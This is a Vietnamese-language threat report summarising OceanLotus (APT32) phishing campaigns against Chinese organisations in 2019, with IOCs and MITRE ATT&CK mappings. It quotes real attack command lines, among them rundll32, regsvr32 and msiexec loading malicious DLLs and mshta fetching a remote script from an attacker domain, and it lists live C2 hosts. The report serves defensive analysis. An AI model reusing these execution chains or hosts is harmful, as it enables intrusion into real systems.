Tóm tắt tìm hình tấn công của nhóm Oceanlotus 2019 tại Trung Quốc

I. Tổng quan

Sea Lotus (OceanLotus) hay còn được gọi là APT32, là một tổ chức tấn công mạng được nhiều tổ chức định danh là xuất phát từ Việt Nam. Kể từ khi hoạt động, nhóm đã thực hiện nhiều cuộc tấn công vào Trung Quốc, cũng như nhiều nước khác trên thế giới.

Trong nữa đầu năm 2019, theo trung tâm tình báo các mối đe dọa an ninh mạng của Tencent đã đưa ra công bố về các cuộc tấn công của nhóm OceanLotus vào Trung Quốc. Các mục tiêu tấn công của tổ chức này rất đa dạng bao gồm các cơ quan chính phủ, cơ quan hàng hải, cơ quan ngoại giao, doanh nghiệp nhà nước lớn, tổ chức nghiên cứu khoa học và một số các doanh nghiệp tư nhân lớn của Trung Quốc. Qua theo dõi, Tencent phát hiện số lượng lớn các mục tiêu trong nước đã bị nhóm này tấn công và toàn bộ mạng nội bộ của mục tiêu đã bị chiếm đóng, có thể xác định một lượng lớn thông tin bí mật và các thông tin cấu hình máy chủ bị đánh cắp. Những kẻ tấn công có vẻ rất quan thuộc với Trung Quốc cũng như hiểu rõ các vấn đề nóng hỏi và cơ cấu chính phủ của Trung Quốc. Ví dụ, khi một cải cách thuế vừa được đưa ra, một kế hoạch cải cách thuế đã ngay lập tức được sử dụng làm chủ đề của một cuộc tấn công.

Các phương thức tấn công không có nhiều thay đổi so với lần đầu phát hiện, nhưng có một số cải tiến nhỏ bao gồm các loại attack decoys, payload, phương thức bypass các lớp bảo mật..etc Phương thức tấn công phishing bằng email vẫn được sử dụng. Sau khi có được quyền kiểm soát máy, kẻ tấn công sẽ dò quét toàn bộ hệ thống mạng. Điều này cũng cho thấy các cuộc tấn công APT sẽ không ngừng cho đến khi nó đạt được mục đích. Miễn là mục tiêu có giá trị, cuộc tấn công sẽ ngày càng mạnh mẽ hơn.

II. Đăc điểm của cuộc tấn công.

2.1 Tấn công bằng email lừa đảo

Sea Lotus thông qua việc gửi Email giả danh về các tổ chức uy tín, người dùng dễ bị đánh lừa tự tải về các File độc hại. Trong suốt năm 2019, đã có rất nhiều email lừa đảo được gửi, chẳng hạn như email sau:

Các tài khoản được sử dụng để gửi email lừa đảo thường là hộp thư của NetEase. Các kiểu tài khoản tấn công thường như là: Sun**@126[.]com, Yang**@163[.] com, chen**@126[.] com…

2.2 Đa dạng hóa các loại mồi nhử lừa đảo

Nhóm thường sử dụng đa dạng hóa các loại mồi nhử cho cuộc tấn công và hầu như tất cả các loại mồi đã được sử dụng. Ngoài các tệp độc hại Ink, tệp doc, tệp nén của WinRAR ACE (CVE-2018-20250) được đề cập trong nhiều bản báo cáo.

Tệp độc hại dưới dạng doc:

Tệp Chm giải mã

Lỗ hổng Winrar (CVE-2018-20250)

2.3 Đa dạng cách thức tải tệp

Do sự đa dạng của các loại mồi nhử cho việc lừa đảo, cách thức tải các tệp độc hại cũng khác nhau.

2.3.1. Thực thi trực tiếp

Tệp thực thi được nguy trang dưới dạng một File DOCX, có icon của microsoft word, được sử dụng để đánh lừa người dùng tải về. Sau khi người dùng có hành vi tải tệp DOC và tiến hành mở. Sau khi File mở ra, các thông tin trong file tài liệu bị xáo trộn, lôi kéo nạn nhân kích hoạt macro code trong file tài liệu để có thể xem nội dung bên trong tài liệu. Trong thực tế, sau khi macro được bật, nội dung bình thường vẫn không hiển thị

2.3.2. Sử dụng Rundll32 để tải dll độc hại

Sau khi thực thi các đoạn mã độc hại, nó sẽ gọi và thực thi đoạn mã độc hại thực sự {1888B763-A56C-4D4B-895C-2092993ECCBA} trong thư mục C:\User\Administrator\AppData\Local\Microsoft, sau đó sử dụng Rundll32 để thực thi dll:

"C:\Windows\system32\rundll32.exe" "C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll",Register

2.3.3. Macro

Sử dụng một Macro để thực thi và mã Macro bị obfuscated:

2.3.4. Office memory thực thi shellcode độc hại

Bằng mã Macro, giải mã trực tiếp shellcode trong Office và tạo ra một luồng để thực thi trong bộ nhớ:

2.3.5. Sử dụng dll

Sử dụng kỹ thuật DLL(DLL Side-Loading) để thực thi, tải các File độc hại:

Các tệp thực thi và các tiến trình bao gồm

Tệp

Tiến Trình

iTunesHelper.exe

AppVersions.dll

SGTool.exe

Inetmib1.dll

Rar.exe

ldvptask.ocx

GoogleUpdate.exe

goopdate.dll

360se.exe

chrome_elf.dll

Winword.exe

wwlib.dll

rekeywiz.exe

mpr.dll

wps.exe

krpt.dll

wechat.exe

WeChatWin.dll

2.3.6. Thực thi

Đăng kí một DLL độc hại như một thành phần của hệ thống để thực thi:

2.3.7. Tệp lệnh nhúng

Tệp Chm sẽ thực thi, nó nhắc thực thi mã ActiveX:

Nội dung kịch bản của tệp:

Tuy nhiên, do vấn đề xử lý mã hóa, chm bị cắt bớt sau khi mở:

Sau khi giản nén, nội dung ban đầu như sau:

2.3.8. Các cuộc tấn công liên tục sử dụng scheduled tasks

Sau khi chm được thực thi, tệp bcdsrv.dll sẽ được phát hành theo %AppData%\Roaming và sau đó một tác vụ theo lịch trình có tên là WeeklyMaintenance sẽ được tạo:

Lệnh thực thi:

C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

Bcdsrv.dll là một tệp tin độc hại thực sự.

2.3.9. Ink gọi mstah để thực hiện

Phân tích chi tiết về kỹ thuật Ink gọi mstah

Sau khi thực hiện, lệnh được gọi:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

Và new.html thực sự là một tập tin Vbs là một tập tin chứa mã có thể thực thi.

2.3.10. Sử dụng odbcconf.exe để tải tệp

Odbcconf.exe là một tệp đi kèm với hệ thống. Tệp này có thể được sử dụng để thực thi tệp dll và vì quá trình máy chủ là tệp hệ thống, nên nó có thể thoát khỏi sự can thiệp của một số phần mềm bảo mật:

2.3.11. Lỗ hổng WinRAR ACE (CVE-2018-20250)

Gói nén với lỗ hổng này có thể được cấu trúc như sau: Ngoài việc giải nén các tệp bình thường sau khi giải nén, thư mục khởi động (C: \ Users \ Administrator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) phát hành tệp tự giải nén:

Tệp này là chương trình tự giải nén. Khi khởi động, nó sẽ phát hành tệp {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx, sau đó thực hiện lệnh:

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx

2.4. Multi-load attack

Trong cuộc tấn công mới nhất, Sea Lotus đã sử dụng một Multi-load attack. Trong các cuộc tấn công trước đó, sau khi giải mã shellcode, RAT cuối cùng đã được thực thi trực tiếp, chẳng hạn như:

chúng tôi thấy rằng sau khi giải mã shellcode, shellcode được tải xuống và thực thi trước. Nếu quá trình tải xuống không thành công, thì RAT được cài đặt trước được tải:

Điều này làm cho các hoạt động tấn công trở nên phong phú và đa dạng hơn và cũng có thể kiểm soát được.

2.5. Cuộc lẩn tránh các phần mềm bảo mật

Sea Lotus cũng sử dụng nhiều phương pháp khác nhau để chống lại phần mềm bảo mật, chủ yếu là:

2.5.1. Sử dụng DLL để thực thi

2.5.2. Sử dụng tệp hệ thống thực thi

Có thể nhắc đến như odbcconf.exe.

2.5.3. Thực thi shellcode trực tiếp trong office

2.5.4. Thêm dữ liệu rác vào các tập tin để mở rộng kich thước.

Để ngăn chặn tập tin được thu thập bởi các nhà cung cấp bảo mật, tổ chức Sea Lotus đã cố tình thêm một lượng lớn dữ liệu rác vào tài nguyên của một số tệp nhất định để mở rộng kích thước tệp.

Nếu một tệp chứa đầy dữ liệu rác, kích thước tệp lên tới 61,4 MB (64,480,256 byte):

2.5.5. Tạo backdoor

Tệp backdoor được mã hóa và tùy chỉnh theo thuộc tính của máy. Do vậy, tệp băm trên mỗi máy là khác nhau và không thể thực hiện được nếu không có thông tin liên quan đến máy chứa backdoor. Ngay cả khi mã độc bị các nhà cung cấp bảo mật tìm thấy, miễn là không có dữ liệu liên quan đến máy tính chưa mã độc thì tải trọng không thể được giải mã.

2.5.6. Nguy trang cho kết nối CnC

Theo thông tin cấu hình, các kết nối và ngụy trang khác nhau có thể được thực hiện, và C2 được lắp ráp và phân tích. Các CnC thường có cấu trúc (xxx là cấu hình C2):

{rand} .xxx

www6.xxx

cdn.xxx api.xxx

Giả mạo các HTTP Header:

2.6. Backdoor tùy chỉnh

Một kỹ thuật ấn tượng nhất của Sea Lotus đã sử dụng vào năm 2019 ( chủ yếu là sử dụng backdoor trong giai đoạn thứ 2) . Kỹ thuật này đã được công bố gần đây với các tệp độc hại do mỗi máy victim phát hành được mã hóa bằng các thuộc tính máy có liên quan (như tên máy) của máy victim và được thực thi. Chúng ta cần một phần thông tin này, nếu không không thể giải mã nó.

Do đó, mỗi tệp độc hại được phát hành là khác nhau và ngay cả khi bị nhà cung cấp bảo mật tìm thấy, miễn là không có dữ liệu liên quan của máy victim, tải trọng thực không thể được giải mã.

Backdoor cũng được thực thi liên quan đến các file và tiến trình bao gồm: AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll và các kết hợp khác để thực thi.

Quá trình mã hóa là:

Qua ví dụ dưới có thể thấy, tên người dùng đã được sử dụng để mã hóa.

Tên người dùng victim là Cao **. Có thể thấy rằng Trojan được tạo ra đặc biệt để lây nhiễm vào máy tính này.

2.7. Phần mềm độc hại

Qua quá trình theo dõi, nhận thấy có Sea Lotus thường sử dụng ba loại phần mềm độc hại chính: CobaltStrike's beacon Trojan, họ Trojan Denis và Ghost đã sửa đổi. Trong đó CobaltStrike's beacon Trojan và họ Trojan Denis thường được phát hiện nhiều nhất, Ghost rất it khi được sử dụng.

CobaltStrike:

Denis:

Ghost được sửa đổi:

2.8. Thâm nhập mạng

Sau khi một máy chủ đã bị nhiễm mã độc thông qua tấn công Email Phishing, Sea Lotus sẽ tiếp tục các cuộc tấn công vào các máy nội bộ. Chúng tiến hành rà quét, tìm kiếm, tấn công sang các máy nội bộ bằng nhiều cách nhất có thể.

Get the hash:

Package file:

Ngoài ra cũng sẽ có các tác vụ được tạo ra theo lịch trình để tải xuống các công cụ liên tục thông qua Powershell:

Tệp độc hại được phát hiện là goopdate.dll.

III. Một số hoạt động khác

Trong quá trình theo dõi, một số cuộc tấn công tương tự được tìm thấy như các cuộc tấn công của Sea Lotus như:

Các mã độc cuối cùng cũng được thực thi bởi hai loại tệp:

· Beacon payload được tạo bởi CobaltStrike.

· Còn lại là Payload block numverse_http được sử dụng bởi metasploit.

Ngoài ra, CnC của các cuộc tấn công này thường được phát hiện ở Trung Quốc:

Mặc dù gần đây đang có những cuộc tấn công giống với các hành vi của Sea Lotus nhưng cũng có những hành vi không giống do đó chưa thể kết luận về các cuộc tấn công đó liên quan đến SeaLotus.

IV. Tóm tắt về Sea Lotus

Sea Lotus là một trong những nhóm APT tích cực nhất trong những năm gần đây, thường xuyên tấn công vào các khu vực ở Trung Quốc và các nước trên thế giới. Nhiều công ty an ninh mạng đã liên tục đưa ra các báo cáo về các cuộc tấn công của Sea Lotus gần đây. Nhóm Sea Lotus này hiện tại vẫn chưa có dấu hiệu dừng lại, chúng liên tục cập nhật các công nghệ, kỹ thuật tấn công gây rất nhiều khó khăn cho các công tác bảo đảm ATTT.

Nâng cao nhận thức bảo mật , không tự ý thực hiện các tệp đính kèm của các email không xác định và không bị đánh lừa bởi các tin nhắn lừa đảo.

V. Khuyến nghị an toàn

· Nâng cao nhận thức về bảo mật, không mở tệp đính kèm của các email không xác định, trừ khi nguồn tài liệu đáng tin cậy và mục đích rõ ràng, không dễ dàng kích hoạt macro của Office.

· Cài đặt các bản vá và bản vá hệ điều hành cho các phần mềm quan trọng như Office một cách kịp thời.

· Sử dụng phần mềm Antivirus để ngăn chặn các cuộc tấn công như ngựa thành Troy có thể xảy ra.

· Người dùng, doanh nghiệp nên triển khai hệ thống phát hiện mối đe dọa sớm như SOC. Hệ thống SOC hiện nay đang là sự lựa chọn hàng đầu của các nhà bảo mật.

VI. Các IOC liên quan và MITRE ATT&CK

6.1. Các IOC liên quan:

MD5

C&C

IPV4

e7920ac10815428de937f2fca076b94c

360skylar.host

43.251.100.20

4095b9682af13ca1e897ca9cc097ec69

wechats.asis

43.254.217.67

b96de3d0023542f8624b82b9773373e9

news.shangrilaexports.com

114.118.80.233

5c5f8c80dcb3283afeb092cb0c13a58a

clip.shangweidesign.com

c90c7abcee1d98a8663904d739185d16

jcdn.jsoid.com

d249411f003d05c0cea012c11ba13716

libjs.inquirerjs.com

3489140891e67807c550aa91c67dc4ad

baidu-search.net

22f8736bbc96c1a58ab07326d730a235

sys.genevrebreinl.com

dade969b00cbc4a0c1b58eeb0e740b63

ad.ssageevrenue.com

3c3b2cc9ff5d7030fb01496510ac75f2

tel.caitlynwells.com

d604c33d6ec99a87a672b3202cb60fa7

us.melvillepitcairn.com

861fc5624fd1920e9d9cc7a236817dd7

upgrade.coldriverhardware.com

8e2b5b95980cf52e99acfa95f5e1570b

cdnwebmedia.com

3c8b2d20e428f8207b4324bb58f5d228

a81424e973b310edd50aed37590f4b8a

cf5d6d28c388edf58e55412983cf804a

6b8bec74620fbf88263b48c5a11b682e

9eb55481a0b5fcd255c8fb8de1042f88

5c00063b11c4710fe5a5a1adaf208b12

d30bc57624d233d94dc53a62908ef2df

886d0dd67e4cf132a1aed84263d661e3

2b3c5c831eb6b921ac128c4d44d70a7a

1dfb41e5919af80c7d0fa163a90e21e5

6.2. MITRE ATT&CK

TACTIC

ID

Name

Initial Access

T1193

Spearphishing Attachment

Execution

T1106

Execution through API

T1129

Execution through Module Load

T1203

Exploitation for Client  Execution

T1085

Rundll32

T1204

User Execution

T1223

Compiled HTML File

T1053

Scheduled Task

T1117

Regsvr32

Persistence

T1179

Hooking

T1053

Scheduled Task

T1060

Registry Run Keys / Startup  Folder

Defense Evasion

T1107

File Deletion

T1140

Deobfuscate/Decode Files or Information

T1036

Masquerading

T1112

Modify Registry

T1027

Obfuscated Files or  Information

T1085

Rundll32

T1099

Timestomp

T1117

Regsvr32

Credential Access

T1179

Hooking

T1056

Input Capture

Discovery

T1083

File and Directory Discovery

T1046

Network Service Scanning

T1135

Network Share Discovery

T1057

Process Discovery

T1082

System Information Discovery

T1007

System Service Discovery

Lateral Movement

T1534

Internal Spearphishing

Collection

T1005

Data from Local System

T1025

Data from Removable Media

T1123

Audio Capture

T1056

Input Capture

T1113

Screen Capture

T1115

Clipboard Data

Command and Control

T1043

Commonly Used Port

T1094

Custom Command and Control  Protocol

T1024

Custom Cryptographic Protocol

T1001

Data Obfuscation

T1065

Uncommonly Used Port